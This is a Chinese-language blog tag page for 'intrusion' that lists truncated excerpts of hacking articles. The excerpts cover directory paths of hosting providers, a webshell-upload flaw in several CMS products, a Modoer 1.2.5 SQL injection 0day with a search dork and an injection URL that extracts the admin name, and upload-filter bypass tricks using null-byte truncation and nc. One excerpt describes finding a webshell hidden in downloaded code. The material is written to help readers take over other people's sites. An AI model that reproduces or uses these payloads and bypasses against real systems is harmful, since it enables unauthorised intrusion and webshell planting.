标签: 入侵

17 篇文章

常见虚拟主机目录对照
路径:D:\virtualhost\web580651\www\ 主机系统/服务商:新网虚拟主机 路径:F:\usr\fw04408\xpinfo\ 主机系统/服务商:万网虚拟主机 路径:D:\hosting\wwwroot\ 主机系统/服务商:Prim@Hosting虚拟主机 路径:E:\wwwroot\longzhihu\wwwroot\ 主机系统/服务商:华众虚拟主机 路径:D:\freeh…
南方数据、良精系统、网软天下通杀漏洞
1、通过upfile_other.asp漏洞文件直接取SHELL 直接打开userreg.asp进行注册会员,进行登录,(在未退出登录的状态下)使用本地上传文件进行上传代码如下: <HTML><HEAD> <META http-equiv=Content-Type content="text/html; charset=gb2312"> <STYLE ty…
Modoer 1.2.5 SQL 0day
演示站点:http://www.xxxxx.com 关键字:Powered by Modoer site:.com (可以根据需求自行拿站) 测试漏洞: ajax.php?action=digg&idtype=shop&keyid=* FROM modoer_admin Where id=1 and substring((Select adminname FROM modoer_a…
上传漏洞的再次发掘
方法一: 本地上传,修改action的地址为上传页面并且在路径后面加上*.asp;或者加个. (此法已测试成功) 方法二: 即截断,直接在路径后面加*.asp空格,然后在16进制下面将20改为00.然后抓包NC上传。这里要切记如果文件大小有变化,一定要修改包的大小。 作者觉得此方法亦较复杂,遂另辟蹊径寻得一好方法,具体如下(此乃重点): 1、首先需要安装opera游览器(非IE内核) 2、找到一处…
源码藏猫腻?
话说某天,为改一代码,遂用DW搜索,如图: 乍一看,不对啊,怎么冒出一个asa文件,我记得这里面的源码全是asp的啊?遂打开该文件,如图: 是不是觉得很像我们平时用的webshell啊?我们再用IE打开看下,如图: 害怕了吧!若是我不知情把它上传到空间去,那就间接的给人家放一个webshell,想想就后怕!看来网上下的代码也不干净,真是天下无免费的午餐......
中国黑客江湖之八大门派
1、安全焦点 门派代表:冰河 除了绿色兵团鼎盛时期,很少有门派能汇聚那么多的高手。武林双鹰、冰河、wolf,flashsky、tombkeeper、isno、 eyas,均是当今武林响当当的人物。每次的安全焦点的年会,参加的都是中国黑客武林绝顶的高手,还有很多神秘的绝顶高手一直不为外界所知,安全焦点的门派实力到底去到什么程度,武林中一直是一个迷。当今黑客武林,安全焦点的震慑力无人能出其右,中国黑客…